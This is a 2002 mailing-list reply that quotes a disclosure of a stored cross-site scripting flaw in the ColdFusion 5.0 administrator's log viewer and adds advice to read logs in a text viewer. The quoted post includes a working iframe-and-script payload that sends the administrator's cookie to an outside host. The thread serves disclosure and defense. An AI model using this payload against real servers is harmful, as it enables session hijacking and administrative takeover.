Something to note: The 'view admin log' feature in CF tends to cause stress on the CF process, and also blocks the log file during opening. So, It's generally a better (and safer, with this cross-site scripting problem that's been around for years) to view the logs file via a text viewer on the sytem. By default, it's c:\cfusion\log\*.log On Mon, 16 Dec 2002, KiLL CoLe wrote: > Cross-site scripting vulnerability in CF 5.0. This > issue was brought up to macromedia on July 22nd, 2002. > Macromedia issued a fix to me, but I have not seen the > fix available to the public. the coldfusion > administrator allows you to view your application log > via your web browser. Under certain conditions, it is > possible to remotely alter coldfusions application > log. take the following code: > > <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#"> > SELECT * FROM Products > Where ProductId = #int(url.productid)# > </CFQUERY> > > if the INT function encounters a value that is not > numeric, it throws an exception and writes the value > that was passed to application.log. Should an > unsuspecting administrator view the log file via their > web browser, script could be executed. Analyze this > code: > if url.productid (from the above example) were passed > in as: > > <iframe name="frame1" width="0" height="0"></iframe> > <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="; > + document.cookie</script> > > this would enable an attacker to steal the value of > the coldfusion administrators cookie. Decrypting the > coldfusion admin's password is well documented, and > exposes a mild-moderate threat to server security. > > **NOTE: there are dozens of other functions that throw > exceptions similar to the INT function. > > __________________________________________________ > Do you Yahoo!? > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > http://mailplus.yahoo.com > >
